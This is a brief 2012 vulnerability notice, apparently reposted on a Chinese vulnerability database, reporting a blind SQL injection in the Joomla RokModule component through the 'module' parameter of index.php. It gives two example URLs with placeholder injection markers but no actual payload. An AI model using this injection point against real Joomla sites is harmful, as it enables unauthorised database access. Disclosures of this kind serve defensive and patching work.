Joomla RokModule Component (index.php, module parameter) Blind SQLi

日期: 2012/09/11 | 标签:joomla | 游览：327

Titulo: Joomla Component RokModule Blind SQLi [module] Vulnerability

Nombre del Componente: Com_rokmodule

Empresa: http://www.rockettheme.com/

Testeado: Linux Backtrack

Autor: Yarolinux Para WebSecurityDev
Twitter: @Yarolinux

Fecha: 09/09/2012

Bueno la Injeccion Va de la siguiente manera:

http://localhost/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]

http://localhost/web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]or[BlindSQLi]

Ok! Eso es todo Difrutenlo!

Estamos trabajando en un laboratorio testeandolo en Joomla 1.7, Muy 
pronto resultados :D

Greetz: Dylan Irzi & WebSecurityDev

← CKEditor和FCKeditor跨站脚本执行和任意PHP代码执行漏洞

Oracle VM VirtualBox 4.1 Local Denial of Service Vulnerability →

ZeroBox Vulnerability Database

坚持！我们将做的更好！

Joomla RokModule Component (index.php, module parameter) Blind SQLi

评论关闭。